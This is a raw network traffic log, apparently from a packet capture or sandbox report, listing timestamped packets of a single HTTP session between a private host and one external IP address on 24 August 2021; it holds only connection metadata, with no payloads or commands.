Aug 24, 2021 08:46:42.762840033 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:42.762860060 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:42.762877941 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:42.762897968 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:42.762917042 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:42.762934923 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:42.762953997 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:42.762972116 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:42.762991905 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:42.763011932 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:42.763031006 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:42.763050079 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:42.763068914 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:42.763088942 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:42.763107061 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:42.763144970 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:42.763163090 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:42.763180971 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:42.765064001 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:42.788784027 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:42.788830042 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:42.788866997 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:42.788893938 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:42.788921118 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:42.788948059 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:42.788975000 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:42.789001942 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:42.789028883 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:42.789055109 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:42.789082050 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:42.789109945 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:42.789135933 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:42.789165020 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:42.789190054 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:42.789215088 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:42.789241076 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:42.789268970 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:42.789289951 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:42.789316893 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:42.789344072 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:42.789370060 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:42.789396048 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:42.789421082 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:42.789448977 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:42.789474964 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:42.789500952 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:42.789530039 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:42.789573908 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:42.789599895 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:42.789627075 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:42.789653063 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:42.789679050 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:42.789705038 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:42.789731979 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:42.789758921 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:42.789787054 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:42.790504932 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:42.790530920 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:42.790534019 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:42.790538073 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:42.790540934 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:42.790544033 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:42.790546894 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:42.790550947 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:42.790554047 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:42.790560961 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:42.790589094 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:42.790617943 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:42.790646076 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:42.790669918 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:42.790692091 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:42.790714025 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:42.790743113 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:42.790755033 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:42.790771961 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:42.790797949 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:42.790817022 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:42.790821075 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:42.790987968 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:42.817358971 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:42.817404032 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:42.817444086 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:42.817476988 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:42.817509890 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:42.817543030 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:42.817579031 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:42.817612886 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:42.817645073 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:42.817678928 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:42.817711115 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:42.817745924 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:42.817781925 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:42.817815065 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:42.817843914 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:42.817877054 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:42.817910910 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:42.817943096 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:42.817975998 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:42.818011999 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:42.818044901 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:42.818078041 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:42.818110943 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:42.818141937 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:42.818177938 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:42.818211079 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:42.818238974 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:42.829308033 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:43.032092094 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:43.033498049 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:43.065943956 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:43.070034027 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:43.102996111 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:43.113642931 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:43.175381899 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:43.176577091 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:43.177381992 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:43.177649021 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:43.177727938 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:43.177759886 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:43.177788019 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:43.177793980 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:43.177819014 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:43.177851915 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:43.177864075 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:43.177881956 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:43.177915096 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:43.177937984 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:43.177947044 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:43.177973032 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:43.178039074 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:43.185461044 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:43.185506105 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:43.185535908 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:43.185564995 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:43.185596943 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:43.185623884 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:43.185650110 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:43.188513994 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:43.188539982 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:44.212531090 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:44.212690115 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:44.237284899 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:44.262101889 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:44.335681915 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:44.335717916 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:44.362637997 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:44.386739016 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:44.397047043 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:44.397125006 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:44.419718981 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:44.445841074 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:44.674727917 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:44.694051981 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:44.695614100 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:44.699589014 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:44.757863045 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:44.772610903 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:44.772646904 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:44.772670031 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:44.772696972 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:44.772721052 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:44.772743940 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:44.772767067 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:44.772789955 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:44.772813082 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:44.772836924 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:44.780803919 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:44.810689926 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:44.812433004 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:44.813755989 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:44.813920975 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:44.815028906 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:44.816175938 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:44.816210032 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:44.816237926 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:44.817761898 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:44.817789078 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:44.817807913 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:44.817826986 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:44.817845106 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:44.817863941 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:44.818365097 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:44.818387985 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:44.818392038 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:44.818639994 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:44.818645000 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:44.818649054 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:44.818651915 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:44.841171026 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:44.843528032 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:44.846508026 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:44.847654104 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:44.847691059 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:44.847811937 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:44.847819090 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:44.847850084 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:44.847929001 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:44.847982883 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:44.848002911 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:44.848061085 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:44.850524902 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:44.850568056 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:44.850596905 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:44.850625992 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:44.850784063 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:44.851087093 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:44.852014065 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:44.854072094 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:44.859441042 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:44.884047985 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:44.885134935 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:44.885302067 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:44.885320902 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:44.885344982 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:44.885366917 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:44.885387897 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:44.885402918 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:44.885412931 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:44.885437965 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:44.885443926 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:44.885462046 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:44.885484934 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:44.885494947 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:44.885507107 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:44.885529995 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:44.885554075 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:44.885555983 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:44.885576010 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:44.885596037 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:44.885601044 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:44.885622978 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:44.885639906 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:44.885675907 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:44.909094095 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:44.909174919 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:44.909200907 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:44.909317017 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:44.909331083 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:44.909362078 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:44.909379959 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:44.909404039 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:44.909427881 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:44.909451008 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:44.909471989 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:44.909483910 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:44.909492970 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:44.909493923 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:44.909518957 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:44.909534931 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:44.909540892 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:44.909560919 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:44.909568071 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:44.909590960 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:44.909616947 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:44.909621954 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:44.909671068 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:44.931756020 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:44.931790113 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:44.932046890 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:44.932068110 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:44.932087898 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:44.932106972 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:44.932123899 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:44.932145119 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:44.932167053 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:44.932187080 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:44.932207108 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:44.932229996 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:44.932250977 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:44.932267904 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:44.932285070 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:44.932301044 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:44.933370113 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:44.955493927 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:44.955527067 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:44.955543995 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:44.955559969 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:44.955575943 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:44.955590963 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:44.955607891 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:44.955626965 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:44.955645084 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:44.955657005 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:44.955660105 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:44.955676079 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:44.955678940 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:44.955693007 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:44.955708027 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:44.955719948 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:44.955724955 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:44.955740929 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:44.955760956 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:44.955801010 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:44.955806017 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:44.955840111 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:44.977916956 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:44.977962971 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:44.977981091 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:44.977998018 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:44.978013992 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:44.978029966 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:44.978045940 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:44.978060961 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:44.978075981 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:44.978091955 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:44.978107929 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:44.978130102 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:44.978146076 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:44.978169918 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:44.978194952 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:44.978215933 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:44.978842020 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:45.001022100 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:45.001287937 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:45.001353979 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:45.001380920 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:45.001430035 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:45.001514912 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:45.001822948 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:45.001851082 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:45.002567053 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:45.004542112 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:45.004576921 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:45.004600048 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:45.004621983 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:45.004643917 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:45.004708052 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:45.004875898 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:45.004931927 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:45.004987001 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:45.005156994 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:45.005177975 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:45.028778076 CEST	80	49715	212.224.105.79	192.168.2.7
